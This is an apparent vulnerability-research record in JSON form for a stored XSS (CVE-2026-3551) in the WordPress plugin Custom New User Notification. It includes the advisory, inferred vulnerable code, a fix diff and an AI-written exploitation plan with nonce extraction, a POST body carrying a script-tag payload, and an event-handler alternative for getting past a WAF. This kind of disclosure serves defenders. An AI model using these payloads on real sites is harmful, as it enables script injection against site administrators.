[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fn4VFMQXiYQyaP4MQGsWRIWvyR8bwSjhgpQcj9nBlGUI":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"source_links":31},"CVE-2026-3551","custom-new-user-notification-authenticated-administrator-stored-cross-site-scripting-via-user-mail-subject-setting","Custom New User Notification \u003C= 1.2.0 - Authenticated (Administrator+) Stored Cross-Site Scripting via 'User Mail Subject' Setting","The Custom New User Notification plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's admin settings in all versions up to, and including, 1.2.0. This is due to insufficient input sanitization and output escaping on multiple settings fields including 'User Mail Subject', 'User From Name', 'User From Email', 'Admin Mail Subject', 'Admin From Name', and 'Admin From Email'. The settings are registered via register_setting() without sanitize callbacks, and the values retrieved via get_option() are echoed directly into HTML input value attributes without esc_attr(). This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in the plugin settings page that will execute whenever a user accesses that page. This could be used in multi-site installations where administrators of subsites could target super administrators.","custom-new-user-notification",null,"\u003C=1.2.0","medium",4.4,"CVSS:3.1\u002FAV:N\u002FAC:H\u002FPR:H\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-15 16:46:28","2026-04-16 05:29:55",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F7a14d35d-144c-4ddd-b288-5e0e006fb165?source=api-prod",[],"researched",false,3,"This research plan targets a Stored Cross-Site Scripting (XSS) vulnerability in the \"Custom New User Notification\" plugin (\u003C= 1.2.0).\n\n---\n\n### 1. Vulnerability Summary\nThe **Custom New User Notification** plugin fails to sanitize and escape several configuration settings. These settings (e.g., `User Mail Subject`, `User From Name`) are registered via `register_setting()` without a `sanitize_callback` and later rendered in the admin settings dashboard via `get_option()` directly inside HTML input `value` attributes without using `esc_attr()`. This allows an authenticated administrator (or a sub-site administrator in a Multi-site environment) to inject a payload that breaks out of the HTML attribute and executes arbitrary JavaScript in the context of any user (typically a Super Admin or Admin) visiting the settings page.\n\n### 2. Attack Vector Analysis\n*   **Vulnerable Endpoint:** `wp-admin\u002Foptions.php` (Standard WordPress settings handler).\n*   **Vulnerable Page:** The plugin's settings page, typically located at `wp-admin\u002Foptions-general.php?page=custom-new-user-notification` (inferred slug).\n*   **HTTP Parameter:** `user_mail_subject`, `user_from_name`, `user_from_email`, `admin_mail_subject`, `admin_from_name`, or `admin_from_email`.\n*   **Authentication Required:** Administrator (or Sub-site Admin in Multi-site).\n*   **Preconditions:** The plugin must be active.\n\n### 3. Code Flow (Inferred from Patch Description)\n1.  **Registration:** During `admin_init`, the plugin calls `register_setting( 'cnun_options_group', 'user_mail_subject' )` (group name inferred). It fails to provide a third argument with a `sanitize_callback` like `sanitize_text_field`.\n2.  **Storage:** When an admin submits the settings form, `options.php` receives the raw payload and updates the option in the `wp_options` table via `update_option()`.\n3.  **Output (The Sink):** In the admin menu callback function (registered via `add_options_page`):\n    *   The plugin retrieves the value: `$subject = get_option('user_mail_subject');`\n    *   The plugin echoes the value into a form: `echo '\u003Cinput type=\"text\" name=\"user_mail_subject\" value=\"' . $subject . '\" \u002F>';`\n    *   Because `$subject` contains `\">\u003Cscript>alert(1)\u003C\u002Fscript>`, the HTML becomes: `\u003Cinput ... value=\"\">\u003Cscript>alert(1)\u003C\u002Fscript>\" \u002F>`.\n\n### 4. Nonce Acquisition Strategy\nSince this exploit targets the standard WordPress Settings API, it requires a nonce generated for the specific settings group.\n\n1.  **Identify the Page:** Navigate to the plugin settings page.\n2.  **Navigate and Inspect:** Use `browser_navigate` to go to `URL_BASE + \"\u002Fwp-admin\u002Foptions-general.php?page=custom-new-user-notification\"`.\n3.  **Extract Nonce and Group:** Use `browser_eval` to extract the `_wpnonce` and the `option_page` values from the hidden inputs.\n    ```javascript\n    \u002F\u002F Example browser_eval logic\n    {\n      \"option_page\": document.querySelector('input[name=\"option_page\"]')?.value,\n      \"nonce\": document.querySelector('input[name=\"_wpnonce\"]')?.value\n    }\n    ```\n4.  **Confirm Identifier:** Confirm if the `option_page` matches `cnun_options_group` or similar.\n\n### 5. Exploitation Strategy\n**Payload:** `\">\u003Cscript>alert(window.origin)\u003C\u002Fscript>`\n\n**Step 1: Authentication**\nLog in to the WordPress instance as an Administrator using the provided credentials.\n\n**Step 2: Information Gathering**\nNavigate to the settings page to confirm the exact parameter names and the nonce.\n*   **URL:** `\u002Fwp-admin\u002Foptions-general.php?page=custom-new-user-notification`\n\n**Step 3: Execution (HTTP Request)**\nSend a POST request to `options.php` to store the payload.\n*   **Method:** `POST`\n*   **URL:** `\u002Fwp-admin\u002Foptions.php`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```\n    option_page=[EXTRACTED_OPTION_PAGE]&\n    action=update&\n    _wpnonce=[EXTRACTED_NONCE]&\n    user_mail_subject=\">\u003Cscript>alert(window.origin)\u003C\u002Fscript>&\n    submit=Save+Changes\n    ```\n\n**Step 4: Triggering the XSS**\nNavigate back to the settings page: `\u002Fwp-admin\u002Foptions-general.php?page=custom-new-user-notification`.\n\n### 6. Test Data Setup\n1.  **Active Plugin:** Ensure `custom-new-user-notification` is installed and activated.\n2.  **Admin User:** Create or use an existing Administrator account.\n3.  **Initial State:** Ensure the settings fields are currently empty or contain default values.\n\n### 7. Expected Results\n*   The `options.php` request should return a `302 Redirect` back to the settings page with `settings-updated=true`.\n*   Upon navigating to the settings page, the browser should execute the JavaScript `alert(window.origin)`.\n*   The HTML source of the page should show the payload breaking out of the `value` attribute:\n    `\u003Cinput ... value=\"\">\u003Cscript>alert(window.origin)\u003C\u002Fscript>\" \u002F>`\n\n### 8. Verification Steps\n1.  **Check DB via WP-CLI:**\n    ```bash\n    wp option get user_mail_subject\n    ```\n    Confirm the output matches the injected payload.\n2.  **DOM Inspection:** Use `browser_eval` to check if the script tag exists in the DOM after the settings page loads.\n    ```javascript\n    document.getElementsByTagName('script').length \u002F\u002F And search for the alert content\n    ```\n\n### 9. Alternative Approaches\n*   **Other Sinks:** If `user_mail_subject` is sanitized (unlikely given the report), repeat the process for `user_from_name`, `admin_mail_subject`, etc.\n*   **Attribute-Based Payloads:** If `\u003Cscript>` tags are blocked by a WAF but the attribute breakout is still possible, use an event handler:\n    `\" onmouseover=\"alert(1)`\n*   **Multi-site Context:** If testing in a Multi-site environment, perform the update as a Blog Admin and verify the trigger as a Super Admin.","The Custom New User Notification plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) due to insufficient input sanitization and output escaping on multiple settings fields. Authenticated administrators can inject arbitrary web scripts into fields like 'User Mail Subject', which will execute whenever an administrator (such as a Super Admin in multi-site) accesses the plugin's settings page.","\u002F\u002F Registration of settings without sanitization callbacks during admin_init\nregister_setting( 'cnun_options_group', 'user_mail_subject' );\nregister_setting( 'cnun_options_group', 'user_from_name' );\nregister_setting( 'cnun_options_group', 'user_from_email' );\n\n---\n\n\u002F\u002F Rendering the settings page without escaping output in value attributes\n$user_mail_subject = get_option('user_mail_subject');\necho '\u003Cinput type=\"text\" name=\"user_mail_subject\" value=\"' . $user_mail_subject . '\" \u002F>';","--- custom-new-user-notification.php\n+++ custom-new-user-notification.php\n@@ -10,12 +10,12 @@\n function cnun_register_settings() {\n-    register_setting( 'cnun_options_group', 'user_mail_subject' );\n-    register_setting( 'cnun_options_group', 'user_from_name' );\n-    register_setting( 'cnun_options_group', 'user_from_email' );\n+    register_setting( 'cnun_options_group', 'user_mail_subject', 'sanitize_text_field' );\n+    register_setting( 'cnun_options_group', 'user_from_name', 'sanitize_text_field' );\n+    register_setting( 'cnun_options_group', 'user_from_email', 'sanitize_email' );\n }\n \n function cnun_settings_page() {\n-    $user_mail_subject = get_option('user_mail_subject');\n+    $user_mail_subject = (string) get_option('user_mail_subject');\n-    echo '\u003Cinput type=\"text\" name=\"user_mail_subject\" value=\"' . $user_mail_subject . '\" \u002F>';\n+    echo '\u003Cinput type=\"text\" name=\"user_mail_subject\" value=\"' . esc_attr( $user_mail_subject ) . '\" \u002F>';\n }","1. Authenticate to the WordPress dashboard as an Administrator.\n2. Navigate to the plugin's settings page (typically under Settings > Custom New User Notification) and inspect the HTML source to identify the `option_page` value and the `_wpnonce` value generated by the Settings API.\n3. Send a POST request to `\u002Fwp-admin\u002Foptions.php` including the valid `_wpnonce`, the `option_page` identifier, and a malicious payload in the `user_mail_subject` parameter, such as: \">\u003Cscript>alert(document.domain)\u003C\u002Fscript>.\n4. Ensure the `action` parameter is set to `update`.\n5. To trigger the vulnerability, navigate back to the plugin's settings page; the injected script will execute in the browser context of any user viewing the page.","gemini-3-flash-preview","2026-04-16 15:26:21","2026-04-16 15:26:37",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcustom-new-user-notification\u002Ftags"]